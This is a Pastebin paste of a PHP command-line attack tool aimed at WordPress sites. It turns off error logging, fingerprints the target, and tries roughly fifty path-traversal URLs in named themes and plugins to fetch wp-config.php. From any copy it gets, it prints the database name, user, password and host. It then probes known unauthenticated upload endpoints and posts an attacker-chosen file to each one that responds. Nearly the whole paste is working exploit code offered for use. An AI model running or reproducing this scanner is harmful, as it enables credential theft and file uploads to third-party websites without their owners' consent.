Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- /*
- AUTHOR : AZZATSSINS CYBERSERKERS
- */
- function curl($azx,$anu,$fl){
- $post = array($anu => "@$fl");
- $ch2 = curl_init ($azx);
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_POST, 1);
- curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
- echo curl_exec ($ch2);}
- echo " ___ ________ ___ ___________________ ______\n / _ /_ /_ / / _ /_ __/ __/ __/ _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ // /\ \ \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/ \n \n";
- $azz=$argv[1];
- $fl=$argv[2];
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$azz");
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $get = curl_exec($ch);
- curl_close($ch);
- if(preg_match("#WordPress (.*?)/>#", $get, $version)){
- $str = str_replace('/>', "", $version[0]);
- $str = str_replace('"', "", $str);
- $users = @file_get_contents("$azz/?author=1");
- preg_match('/<title>(.*?)<\/title>/si',$users,$user);
- $wpuser = explode('|',$user[1]);
- echo " \n_______________________________________________________________\n";
- echo "Site : ".$azz."\n WP User : ".$wpuser[0]."\n Version : ".$str."\n"; }
- $expl = array("/wp-admin/admin-ajax.php?action=importCSVIPCloud&filename=../ ../../wp-config.php","/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php","/wp-content/themes/felis/download.php?file=../wp-config.php","/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php","/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php","wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php","/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php","/wp-content/themes/markant/download.php?file=../../wp-config.php","/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php","/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php","/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php","/wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php","/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php","/wp-content/themes/yakimabait/download.php?file=../wp-config.php","/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php","/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php","/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php","/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php","/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php","/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php","/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php","/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php","/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php","/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php","/wp-content/themes/jarida/download.php?uri=../../../wp-config.php","/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php","/wp-content/themes/tess/download.php?file=../../../wp-config.php","/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php","/wp-content/themes/business-essentials-wp/download.php?file=../../../../wp-config.php","/wp-content/themes/abeta/download.php?arquivo=../../../wp-config.php","/wp-content/themes/wetzel/file-download.php?file=../../../wp-config.php","/wp-content/themes/mRoriz/download.php?filename=../../../../wp-config.php","/wp-content/themes/stt/noticias/download.php?file=../../../../wp-config.php","/wp-content/themes/githook/themessageofchristmas/pdf/download.php?file=../../../../../wp-config.php","/wp-content/themes/icelegacy/download.php?f=../../../wp-config.php","/wp-content/themes/hustle/down.php?f=../../../wp-config.php","/wp-content/themes/copthorne3.0/includes/year3/process.php?file=../../../../../wp-config.php","/wp-content/themes/akademie/download.php?pfad=../../../wp-config.php","/wp-content/themes/gt/download.php?file=../../../wp-config.php","/wp-content/themes/twentyeleven/download.php?file=../../../wp-config.php","/wp-download.php?file=wp-config.php");
- foreach($expl as $exploit){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$azz/$exploit");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- $xp = curl_exec ($ch);
- curl_close($ch);
- if(preg_match("#DB_USER#i",$xp)){
- preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}\n";
- preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}\n";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}\n";
- preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}\n";
- }}
- $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
- foreach($lt as $l){
- $azz = "$azz/$l";
- $process = curl_init($azz);
- curl_setopt($process, CURLOPT_TIMEOUT, 30);
- curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
- curl_setopt($process, CURLOPT_HEADER, TRUE);
- curl_setopt($process, CURLOPT_POST, 1);
- curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
- curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
- $return = curl_exec($process);
- if(preg_match("#DB_USER#i",$return)){
- preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}\n";
- preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}\n";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}\n";
- preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}\n";
- break;
- echo " \n_______________________________________________________________</br>";
- }
- }
- echo "\nChoose Post Name: \n1 : file\n2 : Filedata\n3 : qqfile\n4 : FileToUpload\n5 : file[]\n";
- echo "\nPost Name: ";
- $pn=trim(fgets(STDIN,1024));
- if($pn == 1){
- $expl = array("/jm-ajax/upload_file/","/wp-content/plugins/
- Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php","/wp-content/themes/honestkim/js/redactor/demo/scripts/file_upload.php","/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
- foreach($expl as $vuln){
- $azx = $azz.$vuln;
- $ch = curl_init($azx);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($status_code==200)
- {
- echo "\n[!] Found : ".$azx."\n";
- curl($azx,"file",$fl);
- }}
- }elseif($pn == 2){
- $expl = array("/wp-content/themes/dandelion/functions/upload-handler.php","/wp-content/plugins/wordpress-member-private-conversation/doupload.php","/wp-content/themes/Elemin/themify/themify-ajax.php?upload=1","/wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1","/wp-content/themes/Tisa/themify/themify-ajax.php?upload=1","/wp-content/themes/Funki/themify/themify-ajax.php?upload=1","/wp-content/themes/Pinboard/themify/themify-ajax.php?upload=1","/wp-content/themes/Folo/themify/themify-ajax.php?upload=1","/wp-content/themes/grido/themify/themify-ajax.php?upload=1","/wp-content/themes/Suco/themify/themify-ajax.php?upload=1","/wp-content/themes/iThemes2/themify/themify-ajax.php?upload=1","/wp-content/themes/fullpane/themify/themify-ajax.php?upload=1","/wp-content/themes/simfo/themify/themify-ajax.php?upload=1","/wp-content/themes/rezo/themify/themify-ajax.php?upload=1","/wp-content/themes/bizco/themify/themify-ajax.php?upload=1","/wp-content/themes/minshop/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-landing/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-elegant/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-base/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-corporate/themify/themify-ajax.php?upload=1","/wp-content/themes/themify-music/themify/themify-ajax.php?upload=1","/wp-content/themes/postline/themify/themify-ajax.php?upload=1","/wp-content/themes/newbasic/themify/themify-ajax.php?upload=1","/wp-content/plugins/viral-optins/api/uploader/file-uploader.php");
- foreach($expl as $vuln){
- $azx = $azz.$vuln;
- $ch = curl_init($azx);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($status_code==200)
- {
- echo "\n[!] Found : ".$azx."\n";
- curl($azx,"Filedata",$fl);
- }}}elseif($pn == 3){
- $expl = array("/wp-content/plugins/complete-gallery-manager/frames/upload-images.php","/wp-content/plugins/complete-gallery-manager/frames/upload-images.php","/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php","/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php");
- foreach($expl as $vuln){
- $azx = $azz.$vuln;
- $ch = curl_init($azx);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($status_code==200)
- {
- echo "\n[!] Found : ".$azx."\n";
- curl($azx,"qqfile",$fl);
- }}
- }elseif($pn == 4){
- $expl = array("/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php","/wp-content/plugins/mac-dock-gallery/upload-file.php","/wp-content/themes/kernel-theme/functions/upload-handler.php","/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php","/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
- foreach($expl as $vuln){
- $azx = $azz.$vuln;
- $ch = curl_init($azx);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($status_code==200)
- {
- echo "\n[!] Found : ".$azx."\n";
- curl($azx,"FileToUpload",$fl);
- }}
- }elseif($pn == 5){
- $expl = array("/wp-content/themes/organizer/lib_upload/server/php/","/wp-content/plugins/formcraft/file-upload/server/content/upload.php");
- foreach($expl as $vuln){
- $azx = $azz.$vuln;
- $ch = curl_init($azx);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($status_code==200)
- {
- echo "\n[!] Found : ".$azx."\n";
- curl($azx,"file[]",$fl);
- }}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement